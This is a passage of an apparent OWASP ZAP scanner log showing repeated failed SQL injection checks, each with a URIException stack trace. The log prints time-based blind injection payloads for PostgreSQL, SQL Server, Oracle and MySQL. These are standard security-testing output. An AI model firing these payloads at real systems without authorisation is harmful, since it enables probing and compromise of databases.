org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685426 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685427 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685428 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685430 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685432 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685433 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685434 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685435 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685438 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685439 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685440 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(72)||CHR(67)||CHR(111),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685442 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(110)||CHR(72)||CHR(101),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685444 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(108)||CHR(82)||CHR(101),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685444 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(73)||CHR(114)||CHR(75),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685446 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(68)||CHR(73)||CHR(68),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685447 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(78)||CHR(88)||CHR(81),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685448 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND (SELECT * FROM (SELECT(SLEEP(5)))jeLa) AND (6517=6517] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 